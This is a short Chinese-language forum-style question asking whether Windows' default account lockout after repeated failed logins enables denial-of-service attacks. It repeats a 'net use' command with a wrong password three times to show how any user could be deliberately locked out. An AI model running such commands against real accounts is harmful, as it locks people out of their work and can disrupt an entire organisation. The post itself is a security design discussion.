Windows 的默认行为是在多次失败的身份验证尝试(通常是 3 次)后锁定帐户。
这意味着通过以下
net use \\targetmachine\c$ /user:targetaccount notthepassword
net use \\targetmachine\c$ /user:targetaccount notthepassword
net use \\targetmachine\c$ /user:targetaccount notthepassword
如果没有一个帐户选中“此帐户永远不会被锁定”,您可以锁定一个用户,甚至可能关闭整个公司。
这个安全“功能”真的是拒绝服务攻击的促成因素吗?并且默认情况下应该禁用它。
一个组织特别容易受到流氓员工的影响。